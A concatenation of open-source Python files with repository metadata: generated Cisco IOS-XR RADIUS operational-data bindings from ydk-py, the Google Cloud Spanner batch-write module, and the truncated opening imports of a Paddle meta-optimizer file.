from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Authentication.AuthenticationGroup.Authentication_']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication-group'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.authentication is not None and self.authentication._has_data():
return True
if self.family is not None:
return True
if self.ip_address is not None:
return True
if self.port is not None:
return True
if self.server_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Authentication.AuthenticationGroup']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.authentication_group is not None:
for child_ref in self.authentication_group:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Authentication']['meta_info']
class Accounting(object):
"""
RADIUS accounting data
.. attribute:: accounting_group
List of accounting groups
**type**\: list of :py:class:`AccountingGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Accounting.AccountingGroup>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.accounting_group = YList()
self.accounting_group.parent = self
self.accounting_group.name = 'accounting_group'
class AccountingGroup(object):
"""
List of accounting groups
.. attribute:: accounting
Accounting data
**type**\: :py:class:`Accounting_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Accounting.AccountingGroup.Accounting_>`
.. attribute:: family
IP address Family
**type**\: str
.. attribute:: ip_address
IP address buffer
**type**\: str
.. attribute:: port
Accounting port number
**type**\: int
**range:** 0..4294967295
.. attribute:: server_address
IP address of RADIUS server
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.accounting = Radius.Nodes.Node.Accounting.AccountingGroup.Accounting_()
self.accounting.parent = self
self.family = None
self.ip_address = None
self.port = None
self.server_address = None
class Accounting_(object):
"""
Accounting data
.. attribute:: acct_incorrect_responses
Number of incorrect accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_server_error_responses
Number of server error accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_unexpected_responses
Number of unexpected accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_authenticators
Number of bad accounting authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_responses
Number of bad accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_responses
Number of accounting responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_requests
Number of pending accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: requests
Number of accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: responses
Number of accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: retransmits
Number of retransmitted accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for accounting in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: timeouts
Number of accounting packets timed\-out
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_packet_types
Number of packets received with unknown type from accounting server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.acct_incorrect_responses = None
self.acct_response_time = None
self.acct_server_error_responses = None
self.acct_transaction_failure = None
self.acct_transaction_successess = None
self.acct_unexpected_responses = None
self.bad_authenticators = None
self.bad_responses = None
self.dropped_responses = None
self.pending_requests = None
self.requests = None
self.responses = None
self.retransmits = None
self.rtt = None
self.timeouts = None
self.unknown_packet_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.acct_incorrect_responses is not None:
return True
if self.acct_response_time is not None:
return True
if self.acct_server_error_responses is not None:
return True
if self.acct_transaction_failure is not None:
return True
if self.acct_transaction_successess is not None:
return True
if self.acct_unexpected_responses is not None:
return True
if self.bad_authenticators is not None:
return True
if self.bad_responses is not None:
return True
if self.dropped_responses is not None:
return True
if self.pending_requests is not None:
return True
if self.requests is not None:
return True
if self.responses is not None:
return True
if self.retransmits is not None:
return True
if self.rtt is not None:
return True
if self.timeouts is not None:
return True
if self.unknown_packet_types is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Accounting.AccountingGroup.Accounting_']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting-group'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.accounting is not None and self.accounting._has_data():
return True
if self.family is not None:
return True
if self.ip_address is not None:
return True
if self.port is not None:
return True
if self.server_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Accounting.AccountingGroup']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.accounting_group is not None:
for child_ref in self.accounting_group:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Accounting']['meta_info']
class ServerGroups(object):
"""
RADIUS server group table
.. attribute:: server_group
RADIUS server group data
**type**\: list of :py:class:`ServerGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.server_group = YList()
self.server_group.parent = self
self.server_group.name = 'server_group'
class ServerGroup(object):
"""
RADIUS server group data
.. attribute:: server_group_name <key>
Group name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: dead_time
Dead time in minutes
**type**\: int
**range:** 0..4294967295
**units**\: minute
.. attribute:: groups
Number of groups
**type**\: int
**range:** 0..4294967295
.. attribute:: server_group
Server groups
**type**\: list of :py:class:`ServerGroup_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_>`
.. attribute:: servers
Number of servers
**type**\: int
**range:** 0..4294967295
.. attribute:: vrf_name
VRF name
**type**\: str
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.server_group_name = None
self.dead_time = None
self.groups = None
self.server_group = YList()
self.server_group.parent = self
self.server_group.name = 'server_group'
self.servers = None
self.vrf_name = None
class ServerGroup_(object):
"""
Server groups
.. attribute:: accounting
Accounting data
**type**\: :py:class:`Accounting <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Accounting>`
.. attribute:: accounting_port
Accounting port
**type**\: int
**range:** 0..4294967295
.. attribute:: authentication
Authentication data
**type**\: :py:class:`Authentication <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authentication>`
.. attribute:: authentication_port
Authentication port
**type**\: int
**range:** 0..4294967295
.. attribute:: authorization
Authorization data
**type**\: :py:class:`Authorization <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authorization>`
.. attribute:: family
IP address Family
**type**\: str
.. attribute:: ip_address
IP address buffer
**type**\: str
.. attribute:: is_private
True if private
**type**\: bool
.. attribute:: server_address
Server address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.accounting = Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Accounting()
self.accounting.parent = self
self.accounting_port = None
self.authentication = Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authentication()
self.authentication.parent = self
self.authentication_port = None
self.authorization = Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authorization()
self.authorization.parent = self
self.family = None
self.ip_address = None
self.is_private = None
self.server_address = None
class Accounting(object):
"""
Accounting data
.. attribute:: acct_incorrect_responses
Number of incorrect accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_server_error_responses
Number of server error accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_unexpected_responses
Number of unexpected accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_authenticators
Number of bad accounting authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_responses
Number of bad accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_responses
Number of accounting responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_requests
Number of pending accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: requests
Number of accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: responses
Number of accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: retransmits
Number of retransmitted accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for accounting in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: timeouts
Number of accounting packets timed\-out
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_packet_types
Number of packets received with unknown type from accounting server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.acct_incorrect_responses = None
self.acct_response_time = None
self.acct_server_error_responses = None
self.acct_transaction_failure = None
self.acct_transaction_successess = None
self.acct_unexpected_responses = None
self.bad_authenticators = None
self.bad_responses = None
self.dropped_responses = None
self.pending_requests = None
self.requests = None
self.responses = None
self.retransmits = None
self.rtt = None
self.timeouts = None
self.unknown_packet_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.acct_incorrect_responses is not None:
return True
if self.acct_response_time is not None:
return True
if self.acct_server_error_responses is not None:
return True
if self.acct_transaction_failure is not None:
return True
if self.acct_transaction_successess is not None:
return True
if self.acct_unexpected_responses is not None:
return True
if self.bad_authenticators is not None:
return True
if self.bad_responses is not None:
return True
if self.dropped_responses is not None:
return True
if self.pending_requests is not None:
return True
if self.requests is not None:
return True
if self.responses is not None:
return True
if self.retransmits is not None:
return True
if self.rtt is not None:
return True
if self.timeouts is not None:
return True
if self.unknown_packet_types is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Accounting']['meta_info']
class Authentication(object):
"""
Authentication data
.. attribute:: access_accepts
Number of access accepts
**type**\: int
**range:** 0..4294967295
.. attribute:: access_challenges
Number of access challenges
**type**\: int
**range:** 0..4294967295
.. attribute:: access_rejects
Number of access rejects
**type**\: int
**range:** 0..4294967295
.. attribute:: access_request_retransmits
Number of retransmitted access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_requests
Number of access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_timeouts
Number of access packets timed out
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_incorrect_responses
Number of incorrect authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_server_error_responses
Number of server error authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_unexpected_responses
Number of unexpected authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_authenticators
Number of bad access authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_responses
Number of bad access responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_access_responses
Number of access responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_access_requests
Number of pending access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for authentication in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: unknown_access_types
Number of packets received with unknown type from authentication server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.access_accepts = None
self.access_challenges = None
self.access_rejects = None
self.access_request_retransmits = None
self.access_requests = None
self.access_timeouts = None
self.authen_incorrect_responses = None
self.authen_response_time = None
self.authen_server_error_responses = None
self.authen_transaction_failure = None
self.authen_transaction_successess = None
self.authen_unexpected_responses = None
self.bad_access_authenticators = None
self.bad_access_responses = None
self.dropped_access_responses = None
self.pending_access_requests = None
self.rtt = None
self.unknown_access_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.access_accepts is not None:
return True
if self.access_challenges is not None:
return True
if self.access_rejects is not None:
return True
if self.access_request_retransmits is not None:
return True
if self.access_requests is not None:
return True
if self.access_timeouts is not None:
return True
if self.authen_incorrect_responses is not None:
return True
if self.authen_response_time is not None:
return True
if self.authen_server_error_responses is not None:
return True
if self.authen_transaction_failure is not None:
return True
if self.authen_transaction_successess is not None:
return True
if self.authen_unexpected_responses is not None:
return True
if self.bad_access_authenticators is not None:
return True
if self.bad_access_responses is not None:
return True
if self.dropped_access_responses is not None:
return True
if self.pending_access_requests is not None:
return True
if self.rtt is not None:
return True
if self.unknown_access_types is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authentication']['meta_info']
class Authorization(object):
"""
Authorization data
.. attribute:: author_incorrect_responses
Number of incorrect authorization responses
**type**\: int
**range:** 0..4294967295
.. attribute:: author_request_timeouts
Number of access packets timed out
**type**\: int
**range:** 0..4294967295
.. attribute:: author_requests
Number of access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: author_response_time
Average response time for authorization requests
**type**\: int
**range:** 0..4294967295
.. attribute:: author_server_error_responses
Number of server error authorization responses
**type**\: int
**range:** 0..4294967295
.. attribute:: author_transaction_failure
Number of failed authorization transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: author_transaction_successess
Number of succeeded authorization transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: author_unexpected_responses
Number of unexpected authorization responses
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.author_incorrect_responses = None
self.author_request_timeouts = None
self.author_requests = None
self.author_response_time = None
self.author_server_error_responses = None
self.author_transaction_failure = None
self.author_transaction_successess = None
self.author_unexpected_responses = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authorization'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.author_incorrect_responses is not None:
return True
if self.author_request_timeouts is not None:
return True
if self.author_requests is not None:
return True
if self.author_response_time is not None:
return True
if self.author_server_error_responses is not None:
return True
if self.author_transaction_failure is not None:
return True
if self.author_transaction_successess is not None:
return True
if self.author_unexpected_responses is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authorization']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:server-group'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.accounting is not None and self.accounting._has_data():
return True
if self.accounting_port is not None:
return True
if self.authentication is not None and self.authentication._has_data():
return True
if self.authentication_port is not None:
return True
if self.authorization is not None and self.authorization._has_data():
return True
if self.family is not None:
return True
if self.ip_address is not None:
return True
if self.is_private is not None:
return True
if self.server_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
if self.server_group_name is None:
raise YPYModelError('Key property server_group_name is None')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:server-group[Cisco-IOS-XR-aaa-protocol-radius-oper:server-group-name = ' + str(self.server_group_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.server_group_name is not None:
return True
if self.dead_time is not None:
return True
if self.groups is not None:
return True
if self.server_group is not None:
for child_ref in self.server_group:
if child_ref._has_data():
return True
if self.servers is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:server-groups'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.server_group is not None:
for child_ref in self.server_group:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups']['meta_info']
class DynamicAuthorization(object):
"""
Dynamic authorization data
.. attribute:: disconnected_invalid_requests
Invalid disconnected requests
**type**\: int
**range:** 0..4294967295
.. attribute:: invalid_coa_requests
Invalid change of authorization requests
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.disconnected_invalid_requests = None
self.invalid_coa_requests = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:dynamic-authorization'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.disconnected_invalid_requests is not None:
return True
if self.invalid_coa_requests is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DynamicAuthorization']['meta_info']
@property
def _common_path(self):
if self.node_name is None:
raise YPYModelError('Key property node_name is None')
return '/Cisco-IOS-XR-aaa-protocol-radius-oper:radius/Cisco-IOS-XR-aaa-protocol-radius-oper:nodes/Cisco-IOS-XR-aaa-protocol-radius-oper:node[Cisco-IOS-XR-aaa-protocol-radius-oper:node-name = ' + str(self.node_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.node_name is not None:
return True
if self.accounting is not None and self.accounting._has_data():
return True
if self.authentication is not None and self.authentication._has_data():
return True
if self.client is not None and self.client._has_data():
return True
if self.dead_criteria is not None and self.dead_criteria._has_data():
return True
if self.dynamic_authorization is not None and self.dynamic_authorization._has_data():
return True
if self.server_groups is not None and self.server_groups._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-aaa-protocol-radius-oper:radius/Cisco-IOS-XR-aaa-protocol-radius-oper:nodes'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.node is not None:
for child_ref in self.node:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-aaa-protocol-radius-oper:radius'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.nodes is not None and self.nodes._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius']['meta_info']
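# --- Illustrative usage sketch (editor addition, not part of the generated bindings) ---
# A minimal example of reading this operational data with ydk-py, assuming the caller
# passes in a NetconfServiceProvider already connected to an IOS-XR device. The helper
# name `_example_read_radius_oper` is hypothetical; CRUDService.read() is the standard
# ydk-py service call for retrieving operational data with a filter object.
def _example_read_radius_oper(provider):
    from ydk.services import CRUDService
    crud = CRUDService()
    # Build an empty top-level filter and let the device populate the oper data.
    radius_filter = Radius()
    radius_oper = crud.read(provider, radius_filter)
    return radius_oper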
| {
"content_hash": "807e093ce49248a8e468b7eaff86dfd1",
"timestamp": "",
"source": "github",
"line_count": 2190,
"max_line_length": 269,
"avg_line_length": 41.546118721461184,
"alnum_prop": 0.3778493394588178,
"repo_name": "111pontes/ydk-py",
"id": "2975497caad225bb3f147381a6321ddfebbe4ea2",
"size": "90986",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_aaa_protocol_radius_oper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "7226"
},
{
"name": "Python",
"bytes": "446117948"
}
],
"symlink_target": ""
} |
"""Context manager for Cloud Spanner batched writes."""
from google.cloud.spanner_v1.proto.mutation_pb2 import Mutation
from google.cloud.spanner_v1.proto.transaction_pb2 import TransactionOptions
# pylint: disable=ungrouped-imports
from google.cloud._helpers import _pb_timestamp_to_datetime
from google.cloud.spanner_v1._helpers import _SessionWrapper
from google.cloud.spanner_v1._helpers import _make_list_value_pbs
from google.cloud.spanner_v1._helpers import _metadata_with_prefix
# pylint: enable=ungrouped-imports
class _BatchBase(_SessionWrapper):
"""Accumulate mutations for transmission during :meth:`commit`.
:type session: :class:`~google.cloud.spanner_v1.session.Session`
:param session: the session used to perform the commit
"""
def __init__(self, session):
super(_BatchBase, self).__init__(session)
self._mutations = []
def _check_state(self):
"""Helper for :meth:`commit` et al.
Subclasses must override
:raises: :exc:`ValueError` if the object's state is invalid for making
API requests.
"""
raise NotImplementedError
def insert(self, table, columns, values):
"""Insert one or more new table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(Mutation(insert=_make_write_pb(table, columns, values)))
def update(self, table, columns, values):
"""Update one or more existing table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(Mutation(update=_make_write_pb(table, columns, values)))
def insert_or_update(self, table, columns, values):
"""Insert/update one or more table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(
Mutation(insert_or_update=_make_write_pb(table, columns, values))
)
def replace(self, table, columns, values):
"""Replace one or more table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(Mutation(replace=_make_write_pb(table, columns, values)))
def delete(self, table, keyset):
"""Delete one or more table rows.
:type table: str
:param table: Name of the table to be modified.
:type keyset: :class:`~google.cloud.spanner_v1.keyset.Keyset`
:param keyset: Keys/ranges identifying rows to delete.
"""
delete = Mutation.Delete(table=table, key_set=keyset._to_pb())
self._mutations.append(Mutation(delete=delete))
class Batch(_BatchBase):
"""Accumulate mutations for transmission during :meth:`commit`.
"""
committed = None
"""Timestamp at which the batch was successfully committed."""
def _check_state(self):
"""Helper for :meth:`commit` et al.
Subclasses must override
:raises: :exc:`ValueError` if the object's state is invalid for making
API requests.
"""
if self.committed is not None:
raise ValueError("Batch already committed")
def commit(self):
"""Commit mutations to the database.
:rtype: datetime
:returns: timestamp of the committed changes.
"""
self._check_state()
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
txn_options = TransactionOptions(read_write=TransactionOptions.ReadWrite())
response = api.commit(
self._session.name,
mutations=self._mutations,
single_use_transaction=txn_options,
metadata=metadata,
)
self.committed = _pb_timestamp_to_datetime(response.commit_timestamp)
return self.committed
def __enter__(self):
"""Begin ``with`` block."""
self._check_state()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""End ``with`` block."""
if exc_type is None:
self.commit()
def _make_write_pb(table, columns, values):
"""Helper for :meth:`Batch.insert` et aliae.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
:rtype: :class:`google.cloud.spanner_v1.proto.mutation_pb2.Mutation.Write`
:returns: Write protobuf
"""
return Mutation.Write(
table=table, columns=columns, values=_make_list_value_pbs(values)
)
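# --- Illustrative usage sketch (editor addition, not part of the upstream module) ---
# A minimal example of the batched-write pattern implemented above, assuming `session`
# is an already-created google.cloud.spanner_v1.session.Session and that a 'citizens'
# table with these columns exists; both are assumptions for illustration only.
# Application code typically obtains a Batch indirectly via `database.batch()`, which
# checks out a pooled session and commits on a clean exit in the same way.
def _example_batched_write(session):
    with Batch(session) as batch:
        batch.insert(
            table='citizens',
            columns=('email', 'first_name', 'last_name'),
            values=[('phred@example.com', 'Phred', 'Phlyntstone')],
        )
    # __exit__ committed the mutations on clean exit; the timestamp is recorded here.
    return batch.committed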
| {
"content_hash": "1408c02824a74669655d236dee986f0b",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 88,
"avg_line_length": 31.632183908045977,
"alnum_prop": 0.6320857558139535,
"repo_name": "tswast/google-cloud-python",
"id": "e62763d7fd7c965fabe531ddbe60ed4f5a5bd0e4",
"size": "6100",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spanner/google/cloud/spanner_v1/batch.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "33785371"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
import paddle.static as static
from .meta_optimizer_base import MetaOptimizerBase
from .common import (
CollectiveHelper,
OP_ROLE_KEY,
OP_ROLE_VAR_KEY,
OpRole,
is_backward_op,
